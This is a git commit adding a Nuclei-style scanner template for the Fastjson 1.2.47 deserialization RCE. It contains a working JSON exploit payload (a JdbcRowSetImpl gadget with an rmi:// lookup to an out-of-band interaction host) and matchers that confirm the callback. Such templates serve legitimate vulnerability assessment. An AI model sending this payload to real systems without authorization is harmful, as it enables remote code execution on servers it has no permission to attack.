Create fastjson-version-detection.yaml

2021-11-04 20:36:06 +08:00 · 2021-11-04 20:36:06 +08:00 · 1e556e0cfd
parent fffd1f533c
commit 1e556e0cfd
1 changed files with 44 additions and 0 deletions
--- a/technologies/fastjson-version-detection.yaml
+++ b/technologies/fastjson-version-detection.yaml
@ -0,0 +1,44 @@
+id: fastjson-1-2-47-rce
+
+info:
+  name: Fastjson 1.2.47 Deserialization RCE
+  author: zh
+  severity: critical
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
+    - https://www.freebuf.com/vuls/208339.html
+    - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
+    - https://github.com/wyzxxz/fastjson_rce_tool
+  tags: fastjson,rce,deserialization,oast
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+            "a":{
+                "@type":"java.lang.Class",
+                "val":"com.sun.rowset.JdbcRowSetImpl"
+            },
+            "b":{
+                "@type":"com.sun.rowset.JdbcRowSetImpl",
+                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
+                "autoCommit":true
+            }
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol   # Confirms DNS Interaction
+        words:
+          - "dns"
+
+      - type: word
+        condition: and
+        words:
+          - "Bad Request"
+          - "400"